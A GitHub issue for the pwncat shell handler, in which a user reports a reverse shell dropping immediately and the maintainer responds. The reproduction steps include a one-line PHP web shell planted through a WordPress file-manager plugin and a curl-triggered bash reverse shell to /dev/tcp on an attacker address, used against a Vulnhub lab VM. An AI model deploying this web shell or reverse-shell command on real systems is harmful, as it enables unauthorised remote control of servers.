search

calebstewart / pwncat

Fancy reverse and bind shell handler
https://pwncat.readthedocs.io
MIT License
2.65k stars 256 forks source link

connection failed: channel unexpectedly closed #272

Open colo13verdadeo opened 1 year ago

colo13verdadeo commented 1 year ago

Bug Description

After initiating a reverse shell connection, I receive an error and the shell exits.

pwncat version

OS: Parrot OS

──╼ #pwncat --version
pwncat: Version 0.1.1 (https://github.com/cytopia/pwncat) by cytopia

Target System (aka "victim")

Provide as much detail about the target host as possible. If this is a TryHackMe or Hack The Box or similar machine, please provide the machine name and/or link as well.

Steps to Reproduce

  1. Create a command execution PHP script: 
    <?php
echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
?>
  2. Start pwncat listener with sudo pwncat -lp 441
  3. Execute a reverse shell by invoking the PHP endpoint: 
    curl 'http://192.168.43.6/blog/wp-content/plugins/wp-file-manager/lib/files/injnc2.php?cmd=bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/192.168.43.3/441%3E%261%22'

Instead, the connection closes immediately as seen below:

┌─[root@parrot]─[/home/parrot]
└──╼ #pwncat-cs -lp 441
[19:15:38] Welcome to pwncat 🐈!                                 __main__.py:164
bound to 0.0.0.0:441 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[19:15:55] connection failed: listener aborted                    manager.py:957
(local) pwncat$ exit
[19:15:57] closing interactive prompt                             manager.py:957

Expected Behavior

Receive an active reverse shell.

calebstewart commented 1 year ago
  1. I edited your issue because you ignored the template. 2. You're in the wrong repo. The version output says as much.

I'll have to try and test this, but it might take me a day or two as I haven't touched this project in a long time, and don't have anything setup locally at the moment.

edit: you simply ran the wrong version command. you are using this pwncat. my mistake.

colo13verdadeo commented 1 year ago

Thanks u for reply very soon.

Im forget add this info: Im ussing in victim: VM Aragog downloaded form Vulnhub.

If u want view this sandbox, is in this link: https://youtu.be/Q7UeWILja-g?t=5010

colo13verdadeo commented 1 year ago

Some news @calebstewart ?